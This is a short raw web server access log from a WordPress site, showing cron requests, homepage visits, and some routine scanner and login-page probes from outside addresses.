36.133.115.36 - - [05/Sep/2025:20:54:14 +0800] "POST /wp-cron.php?doing_wp_cron=1757076854.2112469673156738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:20:54:14 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:21:00:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757077254.8334450721740722656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.242.195.152 - - [05/Sep/2025:21:00:54 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [05/Sep/2025:21:04:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757077495.7275080680847167968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.191.20 - - [05/Sep/2025:21:04:56 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Sep/2025:21:13:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757077995.8412570953369140625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [05/Sep/2025:21:13:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:21:19:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757078393.1700670719146728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [05/Sep/2025:21:19:53 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
36.133.115.36 - - [05/Sep/2025:21:23:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757078601.1379859447479248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:21:23:21 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.225.238.220 - - [05/Sep/2025:21:23:36 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
35.225.238.220 - - [05/Sep/2025:21:23:37 +0800] "POST /wp-login.php HTTP/1.1" 200 2972 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [05/Sep/2025:21:27:44 +0800] "POST /wp-cron.php?doing_wp_cron=1757078864.7637999057769775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.84.144.154 - - [05/Sep/2025:21:27:44 +0800] "GET /manager/html HTTP/1.1" 404 8991 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [05/Sep/2025:21:36:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757079412.4581279754638671875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [05/Sep/2025:21:36:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0"
121.127.245.162 - - [05/Sep/2025:21:36:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0"
121.127.245.162 - - [05/Sep/2025:21:36:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0"
